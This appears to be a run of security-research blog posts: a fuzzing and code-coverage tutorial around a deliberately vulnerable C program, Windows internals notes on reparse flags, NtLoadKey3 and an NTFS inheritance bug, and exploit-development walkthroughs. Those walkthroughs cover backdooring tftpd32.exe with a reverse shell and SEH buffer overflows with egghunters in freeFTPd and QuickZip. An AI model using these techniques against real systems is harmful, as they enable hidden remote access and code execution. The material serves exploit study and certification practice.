    char vulnBuff[20];

    memcpy(vulnBuff, buffer, length);

}

int main(int argc, char *argv[]) {
    
    if (argc < 2 || argc > 2) {
        printf("[>] Usage: vuln example.txt\n");
        exit(-1);
    }

    char *filename = argv[1];
    printf("[>] Analyzing file: %s.\n", filename);

    struct ORIGINAL_FILE original_file = get_bytes(filename);

    int checkNum1 = (int)(original_file.length * .33);
    printf("[>] Check 1 no.: %d\n", checkNum1);

    int checkNum2 = (int)(original_file.length * .5);
    printf("[>] Check 2 no.: %d\n", checkNum2);

    int checkNum3 = (int)(original_file.length * .67);
    printf("[>] Check 3 no.: %d\n", checkNum3);

    check_one(original_file.data, checkNum1);
    check_two(original_file.data, checkNum2);
    check_three(original_file.data, checkNum3);
    
    vuln(original_file.data, original_file.length);
    

    return 0;
}

Keep in mind that this is only one type of criteria, there are several different types of criteria that exist in binaries. I selected this one because the checks are so specific it can demonstrate, in an exaggerated way, how hard it can be to reach new code purely by randomness.

Our sample file, which we’ll mutate and feed to this vulnerable application is still the same file from the previous posts, the Canon_40D.jpg file with exif data.

h0mbre@pwn:~/fuzzing$ file Canon_40D.jpg 
Canon_40D.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=11, manufacturer=Canon, model=Canon EOS 40D, orientation=upper-left, xresolution=166, yresolution=174, resolutionunit=2, software=GIMP 2.4.5, datetime=2008:07:31 10:38:11, GPS-Data], baseline, precision 8, 100x68, frames 3
h0mbre@pwn:~/fuzzing$ ls -lah Canon_40D.jpg 
-rw-r--r-- 1 h0mbre h0mbre 7.8K May 25 06:21 Canon_40D.jpg

The file is 7958 bytes long. Let’s feed it to the vulnerable program and see what indexes are chosen for the checks:

h0mbre@pwn:~/fuzzing$ vuln Canon_40D.jpg 
[>] Analyzing file: Canon_40D.jpg.
[>] Canon_40D.jpg is 7958 bytes.
[>] Check 1 no.: 2626
[>] Check 2 no.: 3979
[>] Check 3 no.: 5331
[>] Check 1 failed.

So we can see that indexes 2626, 3979, and 5331 were chosen for testing and that the file failed the first check as the byte at that position wasn’t \x6c.

Experiment 1: Passing Only One Check

Let’s take away checks two and three and see how our dumb fuzzer performs against the binary when we only have to pass one check.

I’ll comment out checks two and three:

check_one(original_file.data, checkNum1);
//check_two(original_file.data, checkNum2);
//check_three(original_file.data, checkNum3);
    
vuln(original_file.data, original_file.length);

And so now, we’ll take our unaltered jpeg, which naturally does not pass the first check, and have our fuzzer mutate it and send it to the vulnerable application hoping for crashes. Remember, that the fuzzer mutates up to 159 bytes of the 7958 bytes total each fuzzing iteration. If the fuzzer randomly inserts an \x6c into index 2626, we will pass the first check and execution will pass to the vulnerable function and cause a crash. Let’s run our dumb fuzzer 1 million times and see how many crashes we get.

h0mbre@pwn:~/fuzzing$ ./fuzzer Canon_40D.jpg 1000000
[>] Size of file: 7958 bytes.
[>] Flipping up to 159 bytes.
[>] Fuzzing for 1000000 iterations...
[>] Crashes: 88
[>] Fuzzing completed, exiting...

So out of 1 million iterations, we got 88 crashes. So on about %.0088 of our iterations, we met the criteria to pass check 1 and hit the vulnerable function. Let’s double check our crash to make sure there’s no error in any of our code (I fuzzed the vulnerable program with all checks enabled in QEMU mode (to simulate not having source code) with AFL for 14 hours and wasn’t able to crash the program so I hope there are no bugs that I don’t know about 😬).

h0mbre@pwn:~/fuzzing/ccrashes$ vuln 998636.11 
[>] Analyzing file: 998636.11.
[>] 998636.11 is 7958 bytes.
[>] Check 1 no.: 2626
[>] Check 2 no.: 3979
[>] Check 3 no.: 5331
[>] Passed all checks!
Segmentation fault

So feeding the vulnerable program one of the crash inputs actually does crash it. Cool.

Disclaimer: Here is where some math comes in, and I’m not guaranteeing this math is correct. I even sought help from some really smart people like @Firzen14 and am still not 100% confident in my math lol. But! I did go ahead and simulate the systems involved here hundreds of millions of times and the results of the empirical data were super close to what the possibly broken math said it should be. So, if it’s not correct, its at least close enough to prove the points I’m trying to demonstrate.

Let’s try and figure out how likely it is that we pass the first check and get a crash. The first obstacle we need to pass is that we need index 2626 to be chosen for mutation. If it’s not mutated, we know that by default its not going to hold the value we need it to hold and we won’t pass the check. Since we’re selecting a byte to be mutated 159 times, and we have 7958 bytes to choose from, the odds of us mutating the byte at index 2626 is probably something close to 159/7958 which is 0.0199798944458407.

The second obstacle, is that we need it to hold exactly \x6c and the fuzzer has 255 byte values to choose from. So the chances of this byte, once selected for mutation, to be mutated to exactly \x6c is 1/255, which is 0.003921568627451.

So the chances of both of these things occurring should be close to 0.0199798944458407 * 0.003921568627451, (about .0078%), which if you multiply by 1 million, would have you at around 78 crashes. We were pretty close to that with 88. Given that we’re doing this randomly, there is going to be some variance.

So in conclusion for Experiment 1, we were able to reliably pass this one type of check and reach our vulnerable function with our dumb fuzzer. Let’s see how things change when add a second check.

Experiment 2: Passing Two Checks

Here is where the math becomes an even bigger problem; however, as I said previously, I ran a simulation of the events hundreds of millions of times and was pretty close to what I thought should be the math.

Having the byte value be correct is fairly straightforward I think and is always going to be 1/255, but having both indexes selected for mutation with only 159 choices available tripped me up. I ran a simulator to see how often it occurred that both indexes were selected for mutation and let it run for a while, after over 390 million iterations, it happened around 155,000 times total.

<snip>
Occurences: 155070    Iterations: 397356879
Occurences: 155080    Iterations: 397395052
Occurences: 155090    Iterations: 397422769
<snip>

155090/397422769 == .0003902393423261565. I would think the math is something close to (159/7958) * (158/7958), which would end up being .0003966855142551934. So you can see that they’re pretty close, given some random variance, they’re not too far off. This should be close enough to demonstrate the problem.

Now that we have to pass two checks, we can mathematically summarize the odds of this happening with our dumb fuzzer as follows:

((159/7958) * (1/255)) == odds to pass first check
odds to pass first check * (158/7958) == odds to pass first check and have second index targeted for mutation
odds to pass first check * ((158/7958) * (1/255)) == odds to have second index targeted for mutation and hold the correct value
((159/7958) * (1/255)) * ((158/7958) * (1/255)) == odds to pass both checks
((0.0199798944458407 * 0.003921568627451‬) * (0.0198542347323448 * 0.003921568627451)) == 6.100507716342904e-9

So the odds of us getting both indexes selected for mutation and having both indexes mutated to hold the needed value is around .000000006100507716342904, which is .0000006100507716342904%.

For one check enabled, we should’ve expected ONE crash every ~12,820 iterations.

For two checks enabled, we should expect ONE crash every ~163 million iterations.

This is quite the problem. Our fuzzer would need to run for a very long time to reach that many iterations on average. As written and performing in a VM, the fuzzer does roughly 1,600 iterations a second. It would take me about 28 hours to reach 163 million iterations. You can see how our chances of finding the bug decreased exponentionally with just one more check enabled. Imagine a third check being added!

How Code Coverage Tracking Can Help Us

If our fuzzer was able to track code coverage, we could turn this problem into something much more manageable.

Generically, a code coverage tracking system in our fuzzer would keep track of what inputs reached new code in the application. There are many ways to do this. Sometimes when source code is available to you, you can recompile the binaries with instrumentation added that informs the fuzzer when new code is reached, there is emulation, etc. @gamozolabs has a really cool Windows userland code coverage system that leverages an extremely fast debugger that sets millions of breakpoints in a target binary and slowly removes breakpoints as they are reached called ‘mesos’. Once your fuzzer becomes aware that a mutated input reached new code, it would save that input off so that it can be re-used and mutated further to reach even more code. That is a very simple explanation, but hopefully it paints a clear picture.

I haven’t yet implemented a code coverage technique for the fuzzer, but we can easily simulate one. Let’s say our fuzzer was able, 1 out of ~13,000 times, to pass the first check and reach that second check in the program.

The first time the input reached this second check, it would be considered new code coverage. As a result, our now smart fuzzer would save that input off as it caused new code to be reached. This input would then be fed back through the mutator and hopefully reach the same new code again with the added possibility of reaching even more code.

Let’s demonstrate this. Let’s doctor our file Canon_40D.jpg such that the byte at the 2626 index is \x6c, and feed it through to our vulnerable application.

h0mbre@pwn:~/fuzzing$ vuln Canon_altered.jpg 
[>] Analyzing file: Canon_altered.jpg.
[>] Canon_altered.jpg is 7958 bytes.
[>] Check 1 no.: 2626
[>] Check 2 no.: 3979
[>] Check 2 failed.

As you can see, we passed the first check and failed on the second check. Let’s use this Canon_altered.jpg file now as our base input that we use for mutation simulating the fact that we have code coverage tracking in our fuzzer and see how many crashes we get when there are only testing for two checks total.

h0mbre@pwn:~/fuzzing$ ./fuzzer Canon_altered.jpg 1000000
[>] Size of file: 7958 bytes.
[>] Flipping up to 159 bytes.
[>] Fuzzing for 1000000 iterations...
[>] Crashes: 86
[>] Fuzzing completed, exiting...

So by using the file that got us increased code coverage, ie it passed the first check, as a base file and sending it back through the mutator, we were able to pass the second check 86 times. We essentially took that exponentially hard problem we had earlier and turned it back into our original problem of only needing to pass one check. There are a bunch of other considerations that real fuzzers would have to take into account but I’m just trying to plainly demonstrate how it helps reduce the exponential problem into a more manageable one.

We reduced our ((0.0199798944458407 * 0.003921568627451‬) * (0.0198542347323448 * 0.003921568627451)) == 6.100507716342904e-9 problem to something closer to (0.0199798944458407 * 0.003921568627451)‬, which is a huge win for us.

Some nuance here is that feeding the altered file back through the mutation process could do a few things. It could remutate the byte at index 2626 and then we wouldn’t even pass the first check. It could mutate the file so much (remember, it is already up to 2% different than a valid jpeg from the first round of mutation) that the vulnerable application flat out rejects the input and we waste fuzz cycles.

So there are a lot of other things to consider, but hopefully this plainly demonstrates how code-coverage helps fuzzers complete a more comprehensive test of a target binary.

Conclusion

There are a lot of resources out there on different code coverage techniques, definitely follow up and read more on the subject if it interests you. @carste1n has a great series where he goes through incrementally improves a fuzzer, you can catch the latest article here: https://carstein.github.io/2020/05/21/writing-simple-fuzzer-4.html

At some time in the future we can add some code coverage logic to our dumb fuzzer from this article and we can use the vulnerable program as a sort of benchmark to judge the effectiveness of a code coverage technique.

Some interesting notes, I fuzzed the vulnerable application with all three checks enabled with AFL for about 13 hours and wasn’t able to crash it! I’m not sure why it was so difficult. With only two checks enabled, AFL was able to find the crash very quickly. Maybe there was something wrong with my testing, I’m not quite sure.

Until next time!

OBJ_DONT_REPARSE is (mostly) Useless.

By: tiraniddo
23 May 2020 at 10:21
Continuing a theme from the last blog post, I think it's great that the two additional OBJECT_ATTRIBUTE flags were documented as a way of mitigating symbolic link attacks. While OBJ_IGNORE_IMPERSONATED_DEVICEMAP is pretty useful, the other flag, OBJ_DONT_REPARSE isn't, at least not for protecting file system access.

To quote the documentation, OBJ_DONT_REPARSE does the following:

"If this flag is set, no reparse points will be followed when parsing the name of the associated object. If any reparses are encountered the attempt will fail and return an STATUS_REPARSE_POINT_ENCOUNTERED result. This can be used to determine if there are any reparse points in the object's path, in security scenarios."

This seems pretty categorical, if any reparse point is encountered then the name parsing stops and STATUS_REPARSE_POINT_ENCOUNTERED is returned. Let's try it out in PS and open the notepad executable file.

PS> Get-NtFile \??\c:\windows\notepad.exe -ObjectAttributes DontReparse
Get-NtFile : (0xC000050B) - The object manager encountered a reparse point while retrieving an object.

Well that's not what you might expect, there should be no reparse points to access notepad, so what went wrong? We'll you're assuming that the documentation meant NTFS reparse points, when it really meant all reparse points. The C: drive symbolic link is still a reparse point, just for the Object Manager. Therefore just accessing a drive path using this Object Attribute flag fails. Still this does means that it will also work to protect you from Registry Symbolic Links as well as that also uses a Reparse Point.

I'm assuming this flag wasn't introduced for file access at all, but instead for named kernel objects where encountering a Symbolic Link is usually less of a problem. Unlike OBJ_IGNORE_IMPERSONATED_DEVICEMAP I can't pinpoint a specific vulnerability this flag was associated with, so I can't say for certain why it was introduced. Still, it's slightly annoying especially considering there is an IO Manager specific flag, IO_STOP_ON_SYMLINK which does what you'd want to avoid file system symbolic links but that can only be accessed in kernel mode with IoCreateFileEx.

Not that this flag completely protects against Object Manager redirection attacks. It doesn't prevent abuse of shadow directories for example which can be used to redirect path lookups.

PS> $d = Get-NtDirectory \Device
PS> $x = New-NtDirectory \BaseNamedObjects\ABC -ShadowDirectory $d
PS> $f = Get-NtFile \BaseNamedObjects\ABC\HarddiskVolume3\windows\notepad.exe -ObjectAttributes DontReparse
PS> $f.FullPath
\Device\HarddiskVolume3\Windows\notepad.exe

Oh well...

Silent Exploit Mitigations for the 1%

By: tiraniddo
22 May 2020 at 23:59
With the accelerated release schedule of Windows 10 it's common for new features to be regularly introduced. This is especially true of features to mitigate some poorly designed APIs or easily misused behavior. The problems with many of these mitigations is they're regularly undocumented or at least not exposed through the common Win32 APIs. This means that while Microsoft can be happy and prevent their own code from being vulnerable they leave third party developers to get fucked.

One example of these silent mitigations are the additional OBJECT_ATTRIBUTE flags OBJ_IGNORE_IMPERSONATED_DEVICEMAP and OBJ_DONT_REPARSE which were finally documented, in part because I said it'd be nice if they did so. Of course, it only took 5 years to document them since they were introduced to fix bugs I reported. I guess that's pretty speedy in Microsoft's world. And of course they only help you if you're using the system call APIs which, let's not forget, are only partially documented.

While digging around in Windows 10 2004 (ugh... really, it's just confusing), and probably reminded by Alex Ionescu at some point, I noticed Microsoft have introduced another mitigation which is only available using an undocumented system call and not via any exposed Win32 API. So I thought, I should document it.

UPDATE (2020-04-23): According to @FireF0X this was backported to all supported OS's. So it's a security fix important enough to backport but not tell anyone about. Fantastic.

The system call in question is NtLoadKey3. According to j00ru's system call table this was introduced in Windows 10 2004, however it's at least in Windows 10 1909 as well. As the name suggests (if you're me at least) this loads a Registry Key Hive to an attachment point. This functionality has been extended over time, originally there was only NtLoadKey, then NtLoadKey2 was introduced in XP I believe to add some flags. Then NtLoadKeyEx was introduced to add things like explicit Trusted Hive support to mitigate cross hive symbolic link attacks (which is all j00ru's and Gynvael fault). And now finally NtLoadKey3. I've no idea why it went to 2 then to Ex then back to 3 maybe it's some new Microsoft counting system. The NtLoadKeyEx is partially exposed through the Win32 APIs RegLoadKey and RegLoadAppKey APIs, although they're only expose a subset of the system call's functionality.

Okay, so what bug class is NtLoadKey3 trying to mitigate? One of the problematic behaviors of loading a full Registry Hive (rather that a Per-User Application Hive) is you need to have SeRestorePrivilege* on the caller's Effective Token. SeRestorePrivilege is only granted to Administrators, so in order to call the API successfully you can't be impersonating a low-privileged user. However, the API can also create files when loading the hive file. This includes the hive file itself as well as the recovery log files.

* Don't pay attention to the documentation for RegLoadKey which claims you also need SeBackupPrivilege. Maybe it was required at some point, but it isn't any more.

When loading a system hive such as HKLM\SOFTWARE this isn't an issue as these hives are stored in an Administrator only location (c:\windows\system32\config if you're curious) but sometimes the hives are loaded from user-accessible locations such as from the user's profile or for Desktop Bridge support. In a user accessible location you can use symbolic link tricks to force the logs file to be written to arbitrary locations, and to make matters worse the Security Descriptor of the primary hive file is copied to the log file so it'll be accessible afterwards. An example of just this bug, in this case in Desktop Bridge, is issue 1492 (and 1554 as they didn't fix it properly (╯°□°)╯︵ ┻━┻).

RegLoadKey3 fixes this by introducing an additional parameter to specify an Access Token which will be impersonated when creating any files. This way the check for SeRestorePrivilege can use the caller's Access Token, but any "dangerous" operation will use the user's Token. Of course they could have probably implemented this by adding a new flag which will check the caller's Primary Token for the privilege like they do for SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege but what do I know...

Used appropriately this should completely mitigate the poor design of the system call. For example the User Profile service now uses NtLoadKey3 when loading the hives from the user's profile. How do you call it yourself? I couldn't find any documentation obviously, and even in the usual locations such as OLE32's private symbols there doesn't seem to be any structure data, so I made best guess with the following:

Notice that the TrustKey and Event handles from NtLoadKeyEx have also been folded up into a list of handle values. Perhaps someone wasn't sure if they ever needed to extend the system call whether to go for NtLoadKey4 or NtLoadKeyExEx so they avoided the decision by making the system call more flexible. Also the final parameter, which is also present in NtLoadKeyEx is seemingly unused, or I'm just incapable of tracking down when it gets referenced. Process Hacker's header files claim it's for an IO_STATUS_BLOCK pointer, but I've seen no evidence that's the case.

It'd be really awesome if in this new, sharing and caring Microsoft that they, well shared and cared more often, especially for features important to securing third party applications. TBH I think they're more focused on bringing Wayland to WSL2 or shoving a new API set down developers' throats than documenting things like this.

Distrusting the patch: a run through my first LPE 0-day, from command injection to path traversal

21 May 2020 at 00:00
Intro - TL;DR On April 29th, exploit-db published a Local Privilege Escalation (LPE) exploit for Druva InSync. Druva had by then implemented a patch on their latest InSync release, fixing the bug. However, the patch introduced an additional bug, paving the way for further exploitation and making it possible for a local low-privileged user to obtain SYSTEM level privileges. A team from Tenable Research and I concurrently discovered this new vulnerability, resulting in a new CVE (CVE-2020-5752) and exploit being published.

Writing Windows File System Drivers is Hard.

By: tiraniddo
20 May 2020 at 21:29
A tweet by @jonasLyk reminded me of a bug I found in NTFS a few months back, which I've verified still exists in Windows 10 2004. As far as I can tell it's not directly usable to circumvent security but it feels like a bug which could be used in a chain. NTFS is a good demonstration of how complex writing a FS driver is on Windows, so it's hardly surprising that so many weird edges cases pop up over time.

The issue in this case was related to the default Security Descriptor (SD) assignment when creating a new Directory. If you understand anything about Windows SDs you'll know it's possible to specify the inheritance rules through either the CONTAINER_INHERIT_ACE and/or OBJECT_INHERIT_ACE ACE flags. These flags represent whether the ACE should be inherited from a parent directory if the new entry is either a Directory or a File. Let's look at the code which NTFS uses to assign security to a new file and see if you can spot the bug?

The code uses SeAssignSecurityEx to create the new SD based on the Parent SD and any explicit SD from the caller. For inheritance to work you can't specify an explicit SD, so we can ignore that. Whether SeAssignSecurityEx applies the inheritance rules for a Directory or a File depends on the value of the IsDirectoryObject parameter. This is set to TRUE if the FILE_DIRECTORY_FILE options flag was passed to NtCreateFile. That seems fine, you can't create a Directory if you don't specify the FILE_DIRECTORY_FILE flag, if you don't specify a flag then a File will be created by default.

But wait, that's not true at all. If you specify a name of the form ABC::$INDEX_ALLOCATION then NTFS will create a Directory no matter what flags you specify. Therefore the bug is, if you create a directory using the $INDEX_ALLOCATION trick then the new SD will inherit as if it was a File rather than a Directory. We can verifying this behavior on the command prompt.

C:\> mkdir ABC
C:\> icacls ABC /grant "INTERACTIVE":(CI)(IO)(F)
C:\> icacls ABC /grant "NETWORK":(OI)(IO)(F)

First we create a directory ABC and grant two ACEs, one for the INTERACTIVE group will inherit on a Directory, the other for NETWORK will inherit on a File.

C:\> echo "Hello" > ABC\XYZ::$INDEX_ALLOCATION
Incorrect function.

We then create the sub-directory XYZ using the $INDEX_ALLOCATION trick. We can be sure it worked as CMD prints "Incorrect function" when it tries to write "Hello" to the directory object.

C:\> icacls ABC\XYZ
ABC\XYZ NT AUTHORITY\NETWORK:(I)(F)
        NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)

Dumping the SD for the XYZ sub-directory we see the ACEs were inherited based on it being a File, rather than a Directory as we can see an ACE for NETWORK rather than for INTERACTIVE. Finally we list ABC to verify it really is a directory.

C:\> dir ABC
 Volume in drive C has no label.
 Volume Serial Number is 9A7B-865C

 Directory of C:\ABC

2020-05-20  19:09    <DIR>          .
2020-05-20  19:09    <DIR>          ..
2020-05-20  19:05    <DIR>          XYZ


Is this useful? Honestly probably not. The only scenario I could imagine it would be is if you can specify a path to a system service which creates a file in a location where inherited File access would grant access and inherited Directory access would not. This would allow you to create a Directory you can control, but it seems a bit of a stretch to be honest. If anyone can think of a good use for this let me or Microsoft know :-)

Still, it's interesting that this is another case where $INDEX_ALLOCATION isn't correctly verified where determining whether an object is a Directory or a File. Another good example was CVE-2018-1036, where you could create a new Directory with only FILE_ADD_FILE permission. Quite why this design decision was made to automatically create a Directory when using the stream type is unclear. I guess we might never know.


APC Series: User APC API

17 May 2020 at 00:00
Hey! Long time no see. Coronavirus makes it harder for me to write posts, I hope I’ll have the time to write - I have a lot I want to share! One of the things I did in the last few weeks is to explore the APC mechanism in Windows and I wanted to share some of my findings. The purpose of this series is to allow you to get a systematic understanding of APC internals.

Portable Executable (PE) backdooring and Address Space Layout Randomization (ASLR)

This blog will go over on how to backdoor windows executable.  The intent is to show how a windows PE can be hijacked and introduced a reverse shell while still allowing the executable to maintain its functionality. We will go over how ASLR provides  security feature that randomises the base address of executables/DLLs and positions of other memory segments like stack and heap. This prevents exploits from reliably jumping to a certain function/piece of code. 

This is why you shouldn't trust any executables that you are introducing to your system without verifying its source or checksum.

References:

Address Space Layout Randomization (ASLR): https://en.wikipedia.org/wiki/Address_space_layout_randomization  

Executables:
tftpd32.exe - is free, open-source TFTP server that is also includes a variety of different services, including DHCP, TFTP, DNS, and even syslog and functions as a TFTP Client as well
PsExec.exe - is a command-line tool that lets you execute processes on remote systems and redirect console applications' output to the local system so that these applications appear to be running locally. 

Tools:

Immunity Debugger (http://debugger.immunityinc.com/ID_register.py) 
LordPE (http://www.malware-analyzer.com/pe-tools) 
XVI32 (http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm)

~~~~~~~~~//*******//~~~~~~~~~

0x0 - Adding a New Section...Code Cave

There are basically two (or more?) ways to get a code cave (1) Find available address space and (2) add a new executable section.

"The concept of a code cave is often employed by hackers and reverse engineers to execute arbitrary code in a compiled program. It can be a helpful method to make modifications to a compiled program in the example of including additional dialog boxes, variable modifications or even the removal of software key validation checks. Often using a call instruction commonly found on many CPU architectures, the code jumps to the new subroutine and pushes the next address onto the stack. After execution of the subroutine a return instruction can be used to pop the previous location off of the stack into the program counter. This allows the existing program to jump to the newly added code without making significant changes to the program flow itself."

(1) Finding a code cave using backdoor-factory

(2) Using LordPE to add a new executable section.


For this blog, we will add a new section. As seen above, I added a section with 1000 virtual size, raw size 400. Also note that virtual offset is 0004B000 as we will need this value to calculate the Relative Value Address (RVA). Since ASLR is enabled, we will use RVA in order to dynamically do our jumps and address redirections.

0x1 - Entry point and New Section address

Using immunity debugger, we get the address of the new section (from this on this will be called code cave)

We can see that the address is currently pointing to 010AB000, however, the 2 higher-bytes of the adressare irrelevant due to ASLR.


We can see the entry point once we open up tftpd32.exe in immunity debugger and verify the memoy map. We will be hijacking the first instruction to make the jump to our code cave. Also, note that we will need to reintroduce these two instructions after the backdoor.


If ASLR was not enabled, we could have easily done a jmp 010AB000. That said, we will need to do some calculations to always hit the code cave regardless if its address is randomized.
To calculate the RVA, we will need the virtual offset and the entry point.



4B000 (VOffset) - 1208C (EntryPoint) = 3 8F74. This mean that we will do a jmp 38F74. 

Using nasm_shell.rb, we generate the following opcodes.


Our first instruction will be updated with E9 6F8F0300 which will do a jump to our code cave.


...if we reload the program, ASLR kicks in as we can see the higher 2 bytes have changed. The same opcodes but different address.


We take the jump and it lands us to the beginning of our code cave.


0x2 - Backdoor/Reverse Shell Code

Once in our code cave, we will add a Metasploit reverse shellcode

We will create the payload in hex format and binary copy it to the program using immunity debugger.


Before the reverse shell can be copied, all the registers and flags have to be said which can be done with PUSHAD and PUSHFD instructions. This is needed to maintain the integrity of the original program execution.


Once reverse shellcode is added, registers and flags are restored to their original state using POPFD and POPAD. However before that, we need to adjust the value of ESP to point it to the original stack/ESP value. 

In my case, here are the ESP values

Before shellcode: 0025F908
After shellcode: 0025F70C


We will need to add 1FC to the ESP to align it, then execute the POPFD and POPAD instructions to restore the registers and flags


At this point, if we add a breakpoint at the end of our shellcode and run the program...we should get a reverse shell to our Kali netcat listener.

As you can see that we have successfully hijacked code execution and redirected it to our code cave containing our reverse shellcode.

0x3 - Restoring Original Program Instructions

Remember the two instruction at the entry point before they were hijacked.? We will now need to restore these two instructions so the program can run as intended.


Keep in mind that we are still dealing with ASLR which means we will need calculate the RVA once again.

0096 BF15 - 0095 0000 = RVA 1 BF15 (this will be our CALL RVA_1 BF15) (additional offset by 10000)

0096 2091 - 0095 0000 = RVA 1 2091 (this will be our JMP RVA_1 2091)  (additional offset by 10000)


At address 010AB169 or RVA 4B169 (virtual offset + 169)

 

RVA_4B169 - RVA_1 BF15 



At address 010AB16E or RVA 4B16E (virtual offset + 16E)


RVA_4B16E- RVA_1 2091




Add these instructions or opcodes as shown below:


And we are done...somewhat.

0x4 - WaitForSingleObject

Our reverse shell calls the WaitForSingleObject function which pushes an ESI value of -1. As a result, tftpd32.exe will not execute until we exit the reverse shell. This mean that we will need to change the ESI value from -1 to 0.

We will trace code execution in immunity debugger using 'Trace Over' command.

Line 5 has DEC ESI instructions which makes ESI = FFFFFFFF. This means that all we need to do is cancel the DEC ESI instructions (making it NOP works just fine)!  




We should now be able to successfully execute the program while it also simultaneously sends a reverse shell to Kali.



Thanks for reading.

freeFTPd-1.0.10 SEH Based Buffer Overflow

Kali Linux
Windows Vista
freeFTPD 1.0.10

Original Author, POC, and vulnerable software: https://www.exploit-db.com/exploits/27747


~~~~~~//******//~~~~~~

Vulnerable program:




Initial Proof-of-Concept 


...and we get our initial crash where our SEH handler and nSEH have been overwritten with 41s.



Calculating the offset values

As usual, we use Metasploit's pattern _create.rb and pattern_offset.rb




We update our POC with the following offset values


...and we verify that we hit the correct offset values as shown with the Cs and Bs


POP-POP-RET 


Since this a SEH based buffer overflow, as usual we will need a POP-POP-RET address.

I am using mona.py to find this address.

Also, note that we will need to find an address that SAFESEH and ASLR disabled.

We will use address 0x0041B865



Again, we update our POC with our SEH Handler redirect address


We send our exploit up and we have successfully redirected code execution as we hit our POP-POP-RET address.


We follow the POP-POP-RET and we hit our nSEH which is just right below our As

Note: We currently do not see our Ds.


...however, if we scroll further down, we can see that our Ds are still loaded in memory. Just need find them...aka. egghunter.


First Jump

Since our first jump is limited to just 4 bytes, we will do a 2 byte reverse short jmp

EB 80 or jmp short reverse 128 bytes.

We update our nSEH with EB 80 and added 2 more NOPs (not necessary) to complete the 4 bytes.



We fire up the POC on more time, take the pop-pop-ret, and hit our first jump



Restricted characters 


After going through the 256 hex characters, we found that 0xa is the only restricted character

So far, we have accomplished the following:

1. Successfully crash the program and overwrite the SEH and nSEH
2. Calculated the offset values
3. Found POP-POP-RET address
4. Completed the first jump from nSEH which allows 127 bytes of address space


Egg...hunting!


Reminder...you can create an egghunter using mona.py


Note: I am using a slightly different egghunter shellcode.

We update our POC with our egghunter shellcode and add the egg in front of our Ds



Send the exploit up...take the first jump (EB 80) and we land on our NOP sled.

If we scroll down, our egghunter is just right below our the NOP sled.

We let the egghunter execute while adding a breakpoint at JMP EDI to check the value of EDI.

Here we can see that we have successfully located our egg...all that we need to do now is add our reverse shellcode right after our egg.


At this point we are ready to add our reverse shell





QuickZip 4.60 SEH Based Buffer Overflow w/ Egghunter

Structured Exception Handling (SEH)Based Buffer Overflow Vulnerability

Kali Linux
Windows Vista
QuickZip 4.60


Bug found by: corelancod3r (http://corelan.be:8800)
Software Link: http://www.quickzip.org/downloads.html


GitHub:https://github.com/pyt3ra/QuickZip_4_60_SEH-Based-Buffer-Overflow

~~~~~~//******//~~~~~~

This is another SEH based buffer overflow with an egghunter implementation. A more detailed explanation that I wrote about an egghunter implementation can be found here: https://www.pyt3ra.com/2020/03/slae-assignment-3.html

You can find numerous write-ups about this vulnerability and exploit it. This buffer overflow vulnerability gives us a good mix of shellcode encoding due to restricted characters as well as how to implement an egghunter. 

I'm doing this as part of my preparation of Offensive Security Certified Expert (OSCE) certification

0x0 - Setup

Our Proof-of-Concept creates a .zip file that we will access using QuickZip.





0x1 - Fuzzing

As usual, step one in exploit development is fuzzing. This allows us to examine how the program responds when we introduce a buffer (oversized) to it.

We will be using the fuzzer from corelan as shown below.


We examine the crash using immunity debugger and we can see that have successfully overwritten the SEH handler with 41s.


0x2 - Calculating the offset

We will utilize Metasploit's pattern_create.rb and pattern_offset.rb

First, we create unique characters of 4068 bytes and update our POC



We check the SEH chain after the crash to get the offset values

SEH: 6B41396A
nSEH: 41386A41


Second, we calculate these values using pattern_offset.rb


Finally, we update our POC and verify if these values are correct.

If everything is correct, we should see Bs at byte 294 and Cs at byte 298.



Our values are correct as we see the 43s and 42s overwrite both SEH and nSEH respectively.


0x3 - Verifying Restricted Characters

At this point, we are now ready to find an address to redirect the SEH handler. However, before we waste our time looking for an address, we will need to verify first if there are restricted characters. 

First, I worked on the first 128 bytes (x01 to x7F)

I sent the characters to the program and carefully watching how the program responds to the characters. If it gets mangled/truncated/updated, then it's a bad character.

After numerous tries, I was able to narrow down the restricted characters to the following:

'\x10\x0f\x14\x15\x2f\x3d\x3a\x5b'

Updated POC below:


Second, I worked with the other 128 bytes (x80 to xff)

Interestingly, hex characters 80 and above are changed to an arbitrary hex character.

I sent the following characters...


...and we see the following conversion in Immunity Debugger

The table below shows the conversion (not a complete list).



0x4 - POP-PO-RET address!

Now that we know which characters are not allowed, we are ready to find a POP-POP-RET address.

Lucky for us, Immunity Debugger's mona.py module enables an easier way to find a POP-POP-RET address. 

There were multiple addresses found.

Although not ideal since it has null bytes, we will be using address 00435133


We can verify that this is indeed a POP-POP-RET address by searching for it.


We can update our POC with this address and see if our SEH handler gets redirected to it. 

Note that the address has to be in little-endian.


We fire up the POC and we have successfully redirected the SEH handler as shown below:




…once we take the pop-pop-ret, we then get redirected to our nseh values (EBs)

Note that our  Ds are nowhere to be found now, however, our As are easily accessible which is just right above our nSEH. This means our initial jump will have to be a reverse jump to the beginning of our As that should get us at least 127 bytes of address space to further jump to a bigger space (Ds location)


0x5 - First Jump


Normally, we would be able to easily to a reverse jump short 80 (EB 80). However, note that any hex character of 80 or over is restricted and converts to a different hex character.

More info about jump shorts (forward and reverse) can be found here: https://thestarman.pcministry.com/asm/2bytejumps.htm

If we go back to our bad characters table…we can see that hex 89 and 9F translates to EB and 83 respectively.

89
EB
9F
83

Here's how the EB 83 instructions would work as shown in Immunity. 


We can now update our POC with our first jump


We see our EB 83 first jump in SEH chain


We take the pop-pop-ret and we successfully hit our first jump…from 0012FBB0 to 0012FB35


0x6 - Second Jump - Egghunter

Remember that the address space for our Ds is missing now (still in memory). This is where ideally where reverse shellcode would be. 

Note above that our dump doesn't show the address space where are Ds are close to our As.

Just because we can't find it doesn't mean it is missing…this is where an egghunter shellcode comes in to play.

Here's a write-up that I did about egghunter: https://www.pyt3ra.com/2020/03/slae-assignment-3.html

Mona.py also has a module to create an egghunter.

Note: I will be using a different egghunter

Due to restricted characters, we will need to carve out our egghunter shellcode so I will be using the egghunter shellcode that I used for OSCE prep (I spent way too much time carving them).

Also, note that I did another EB 83 at the beginning of our second jump to allow another 120+ bytes of address space as I noticed that the first jump wasn't enough space
  
